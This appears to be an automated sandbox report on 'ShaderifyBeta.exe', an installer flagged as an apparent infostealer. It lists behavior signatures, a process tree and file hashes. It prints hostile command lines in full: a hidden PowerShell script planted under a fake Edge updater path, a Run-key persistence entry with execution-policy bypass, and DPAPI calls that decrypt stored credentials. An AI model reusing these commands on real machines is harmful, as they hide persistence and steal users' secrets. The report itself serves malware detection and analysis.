Overview
overview
8Static
static
3Shaderify ....4.exe
windows7-x64
8Shaderify ....4.exe
windows10-2004-x64
8$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1ShaderifyBeta.exe
windows7-x64
8ShaderifyBeta.exe
windows10-2004-x64
8d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1resources/app.js
windows7-x64
3resources/app.js
windows10-2004-x64
3resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1swiftshade...GL.dll
windows7-x64
1swiftshade...GL.dll
windows10-2004-x64
1swiftshade...v2.dll
windows7-x64
1swiftshade...v2.dll
windows10-2004-x64
1vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 08:53
Static task
static1
Behavioral task
behavioral1
Sample
Shaderify Beta 8.4.4.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Shaderify Beta 8.4.4.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral7
Sample
LICENSES.chromium.html
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
ShaderifyBeta.exe
Resource
win7-20240508-en
Behavioral task
behavioral10
Sample
ShaderifyBeta.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240221-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240508-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
resources/app.js
Resource
win7-20240508-en
Behavioral task
behavioral19
Sample
resources/app.js
Resource
win10v2004-20240508-en
Behavioral task
behavioral20
Sample
resources/elevate.exe
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
resources/elevate.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral22
Sample
swiftshader/libEGL.dll
Resource
win7-20231129-en
Behavioral task
behavioral23
Sample
swiftshader/libEGL.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral24
Sample
swiftshader/libGLESv2.dll
Resource
win7-20240221-en
Behavioral task
behavioral25
Sample
swiftshader/libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral26
Sample
vk_swiftshader.dll
Resource
win7-20240221-en
Behavioral task
behavioral27
Sample
vk_swiftshader.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral28
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral29
Sample
vulkan-1.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral30
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240221-en
Behavioral task
behavioral31
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240508-en
General
-
Target
ShaderifyBeta.exe
-
Size
120.4MB
-
MD5
b9f8c41f3f567782a8dfc4a90f35163c
-
SHA1
89afe38e055b6fc96a36158bdca344fc73d9c659
-
SHA256
1ec5238c41c2f9655cee2b676a9c7a48821f624b1c59a4a4ac05583b21dd1458
-
SHA512
49d495b2bc6cdcc9a64d77560a92dc9e6377cba9892b23a9f3d79fa3f42b28635d87e96b20e2a8303238e8c8faaed6849210274a28fe65f6dcf24ca0c7cc52c3
-
SSDEEP
1572864:g1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Fasulbg8yTnbEOz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ShaderifyBeta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation ShaderifyBeta.exe -
Loads dropped DLL 1 IoCs
Processes:
ShaderifyBeta.exepid process 4400 ShaderifyBeta.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cJuWbaEYwqGmdMS.ps1\"" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ipapi.co 17 ipapi.co -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 5036 cmd.exe 4092 cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exeShaderifyBeta.exeShaderifyBeta.exepid process 2788 powershell.exe 2788 powershell.exe 2420 powershell.exe 2420 powershell.exe 1344 powershell.exe 1344 powershell.exe 1252 ShaderifyBeta.exe 1252 ShaderifyBeta.exe 2740 ShaderifyBeta.exe 2740 ShaderifyBeta.exe 2740 ShaderifyBeta.exe 2740 ShaderifyBeta.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tasklist.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3636 tasklist.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 1344 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ShaderifyBeta.execmd.execmd.exepowershell.execsc.execmd.execmd.exedescription pid process target process PID 4400 wrote to memory of 2724 4400 ShaderifyBeta.exe cmd.exe PID 4400 wrote to memory of 2724 4400 ShaderifyBeta.exe cmd.exe PID 4400 wrote to memory of 3052 4400 ShaderifyBeta.exe cmd.exe PID 4400 wrote to memory of 3052 4400 ShaderifyBeta.exe cmd.exe PID 2724 wrote to memory of 2788 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2788 2724 cmd.exe powershell.exe PID 3052 wrote to memory of 3636 3052 cmd.exe tasklist.exe PID 3052 wrote to memory of 3636 3052 cmd.exe tasklist.exe PID 2788 wrote to memory of 424 2788 powershell.exe csc.exe PID 2788 wrote to memory of 424 2788 powershell.exe csc.exe PID 424 wrote to memory of 2040 424 csc.exe cvtres.exe PID 424 wrote to memory of 2040 424 csc.exe cvtres.exe PID 4400 wrote to memory of 5036 4400 ShaderifyBeta.exe cmd.exe PID 4400 wrote to memory of 5036 4400 ShaderifyBeta.exe cmd.exe PID 5036 wrote to memory of 2420 5036 cmd.exe powershell.exe PID 5036 wrote to memory of 2420 5036 cmd.exe powershell.exe PID 4400 wrote to memory of 4092 4400 ShaderifyBeta.exe cmd.exe PID 4400 wrote to memory of 4092 4400 ShaderifyBeta.exe cmd.exe PID 4092 wrote to memory of 1344 4092 cmd.exe powershell.exe PID 4092 wrote to memory of 1344 4092 cmd.exe powershell.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2272 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 1252 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 1252 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2740 4400 ShaderifyBeta.exe ShaderifyBeta.exe PID 4400 wrote to memory of 2740 4400 ShaderifyBeta.exe ShaderifyBeta.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxqp5jle\rxqp5jle.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49AB.tmp" "c:\Users\Admin\AppData\Local\Temp\rxqp5jle\CSCE4340FD8C5CF418888524C9E3494AA8.TMP"5⤵PID:2040
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,153,5,53,101,41,221,199,69,137,25,8,206,225,102,110,200,122,91,33,160,134,229,213,22,203,204,228,9,108,217,15,36,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,169,143,159,124,134,19,21,115,239,86,173,129,115,75,126,28,211,192,67,176,83,172,180,133,53,36,115,134,63,125,108,48,0,0,0,247,204,77,117,114,109,27,84,75,239,250,231,249,252,110,35,28,202,157,116,66,197,80,79,79,53,42,90,124,78,22,98,170,121,69,228,70,161,95,144,248,17,178,142,224,204,145,171,64,0,0,0,147,222,190,106,197,5,164,148,65,178,237,73,45,249,247,52,202,203,218,107,66,57,114,152,65,63,102,164,185,7,212,103,210,243,200,201,208,204,243,76,218,218,33,186,103,238,37,186,225,235,182,3,102,148,159,173,246,151,154,219,224,67,3,103), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,153,5,53,101,41,221,199,69,137,25,8,206,225,102,110,200,122,91,33,160,134,229,213,22,203,204,228,9,108,217,15,36,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,169,143,159,124,134,19,21,115,239,86,173,129,115,75,126,28,211,192,67,176,83,172,180,133,53,36,115,134,63,125,108,48,0,0,0,247,204,77,117,114,109,27,84,75,239,250,231,249,252,110,35,28,202,157,116,66,197,80,79,79,53,42,90,124,78,22,98,170,121,69,228,70,161,95,144,248,17,178,142,224,204,145,171,64,0,0,0,147,222,190,106,197,5,164,148,65,178,237,73,45,249,247,52,202,203,218,107,66,57,114,152,65,63,102,164,185,7,212,103,210,243,200,201,208,204,243,76,218,218,33,186,103,238,37,186,225,235,182,3,102,148,159,173,246,151,154,219,224,67,3,103), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,79,171,147,34,242,140,11,144,120,220,207,24,1,221,227,169,44,203,106,123,198,62,79,112,151,240,97,129,25,0,50,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,32,55,196,118,8,60,34,118,98,67,63,99,6,38,147,168,170,66,7,134,227,81,225,238,7,185,77,116,227,246,218,58,48,0,0,0,78,190,62,86,160,155,76,226,24,98,1,99,171,202,6,173,38,116,115,17,183,57,67,52,104,15,151,198,177,138,154,219,128,136,105,37,238,1,157,221,171,183,164,115,48,229,49,214,64,0,0,0,125,51,56,187,118,74,244,13,72,110,208,133,201,236,145,223,199,106,152,47,227,46,94,245,9,105,158,218,74,107,44,139,41,14,192,86,33,57,145,152,112,35,146,122,237,245,61,79,197,152,91,113,187,28,240,193,73,96,252,159,90,120,136,138), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,79,171,147,34,242,140,11,144,120,220,207,24,1,221,227,169,44,203,106,123,198,62,79,112,151,240,97,129,25,0,50,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,32,55,196,118,8,60,34,118,98,67,63,99,6,38,147,168,170,66,7,134,227,81,225,238,7,185,77,116,227,246,218,58,48,0,0,0,78,190,62,86,160,155,76,226,24,98,1,99,171,202,6,173,38,116,115,17,183,57,67,52,104,15,151,198,177,138,154,219,128,136,105,37,238,1,157,221,171,183,164,115,48,229,49,214,64,0,0,0,125,51,56,187,118,74,244,13,72,110,208,133,201,236,145,223,199,106,152,47,227,46,94,245,9,105,158,218,74,107,44,139,41,14,192,86,33,57,145,152,112,35,146,122,237,245,61,79,197,152,91,113,187,28,240,193,73,96,252,159,90,120,136,138), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
-
C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:22⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2200 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1872 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2740
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD552cc110bb3777aa6bba7900630d4eb49
SHA13663dc658fd13d407e49781d1a5c2aa203c252fc
SHA256892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6
SHA51289b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
1KB
MD568d80cc2ac40ea9e5c7297fba6623c45
SHA105908daef7414f753fa6006082c42485002a7da8
SHA2563b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96
SHA5122c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6
-
Filesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
Filesize
1KB
MD57b1c2af8ddbcd4c3363b180262abd7d0
SHA15e8c5227748093c40d64e0717607acdbdd29b9b7
SHA2569f053ba56308492806f15ca87db1b336dee056f534bf4ee806c1897d29402299
SHA512f18afa42c832983ddb5a53e5a451d477d82b5e6d9ef6c17109b3c64baaef310347b1413f0142e63d8d72dd05eec815ceecf75b1654b3027ec4a915a5b5e851c1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
3KB
MD57d368ef8c4c56efa9547e63e4ec515aa
SHA146f3516cfdadca41f878994f5133fca64665dc5e
SHA256e924c2bd8e16474bf12f3bd3ac611dd3d9f5ea001b86dd5e52a9f96d384bc749
SHA512e57471f84847dafbd6f95702b0fb5f21d6ae8a8eaea30a735e59ec5a3e10f83ee481b646c61a6d3088a44536406d1222493ebbc4ddbe8c43b296586fd69bd52e
-
Filesize
652B
MD5ccbf1e6bddb19b391dabbb5c8ebbdb01
SHA18c1fe2349bea8bcf3542bf5a30627960ce9f807f
SHA256d75d83eb8f467390c5c2f9245a62b617786e55f5a0a3815ab2e4e73dc752737a
SHA5127136016be56afb67ff3d4934db4cc1ec3fc141c2bd5d76c49fff625773d5f84f34db9993a53cc9483b237758f03c1791edb53956924fc1fb8164158edcf800d0
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD518a339e346aa61df6906b165ebceac0d
SHA1d4a60b888c0e2e8c9d77a79ce22e3e56e09e400c
SHA25611eb4bfaefce360800f256c97e0edef53de240e0cfd84d10982fbd84795ad20d
SHA5128df662c72e3f1f94e0ddff509d334e007935777043297270351c39a1f203bfb1c6652dd81d67f5b4652940a79ee97d0ba3cc78657f30a5189291739c05030891